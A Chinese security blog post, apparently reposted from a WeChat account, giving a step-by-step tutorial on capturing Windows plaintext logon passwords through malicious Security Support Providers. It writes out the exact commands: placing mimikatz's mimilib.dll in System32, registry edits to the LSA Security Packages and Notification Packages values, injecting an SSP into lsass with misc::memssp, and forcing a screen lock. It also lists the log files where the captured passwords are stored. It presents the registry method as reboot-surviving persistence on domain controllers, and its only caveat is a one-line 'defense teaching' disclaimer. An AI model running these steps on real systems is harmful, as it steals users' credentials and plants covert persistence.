SSP方式获取win明文密码

admin 2022年1月5日11:51:39安全文章评论17 views1292字阅读4分18秒阅读模式
SSP方式获取win明文密码
一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚


SSP记录明文密码


安全支持提供程序(SSP)是一个dll文件,用于扩展Windows身份验证机制。

我们熟悉的lsass进程在启动时会加载安全支持提供程序SSP。当我们替换某个ssp为恶意ssp,或者将ssp文件上传,修改lsa注册表使之启动时加载,然后我们就可以利用恶意dll将输入lsass程序的明文密码保存下来,实现抓明文密码。
此方法适用于win8/win2012后无法获取明文密码,或者维持域控、在域控上抓用户密码
前提是有管理员权限

ssp文件落地法


在mimikatz中有32和64两个版本,安装包里分别都带有不同位数的mimilib.dll
SSP方式获取win明文密码
复制mimilib.dll放到System32路径下,注意版本对应32或64位系统
然后修改hklmsystemcurrentcontrolsetcontrollsa注册表中Security Packages项的值来加载新的安全支持提供程序mimilib.dll
reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberosmsv1_0schannelwdigesttspkgpku2umimilib" /f
SSP方式获取win明文密码
系统重启后将生效,并且持续有效,适用于维持权限
当用户或域用户登录时,在c:windowssystem32生成文件kiwissp.log,记录登录用户的明文密码
C:WindowsSystem32kiwissp.log
SSP方式获取win明文密码

ssp不落地法


mimikatz支持向lsass注入ssp,此技术不需要将mimilib.dll放入磁盘或创建注册表项,不需要重启既可以获取账户信息

缺点就是重新启动后失效
privilege::debugmisc::memssp
SSP方式获取win明文密码
修改完之后锁屏
rundll32 user32.dll LockWorkStation
等用户输入密码登录后,将在System32中创建一个日志文件记录明文密码
C:WindowsSystem32mimilsa.log
SSP方式获取win明文密码
记录修改密码


mimilib.dll里面的函数很多,功能很强,还有一个功能就是记录你修改的密码
mimilib.dll移动到System32路径下

修改hklmSystemCurrentControlSetControlLsa注册表Notification Packages项的值,在其中添加一个mimilib
reg add "hklmSystemCurrentControlSetControlLsa" /v "Notification Packages" /t REG_MULTI_SZ /d "sceclirassfmmimilib" /f
SSP方式获取win明文密码
重新启动系统,当系统发生修改密码的事件时,将生成一个日志文件记录用户新修改的明文密码
C:WindowsSystem32kiwifilter.log
SSP方式获取win明文密码
最近比较菜,没东西写了,只能发发笔记不然断更了。。。

本文始发于微信公众号(XG小刚):SSP方式获取win明文密码

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日11:51:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  SSP方式获取win明文密码 http://cn-sec.com/archives/456861.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: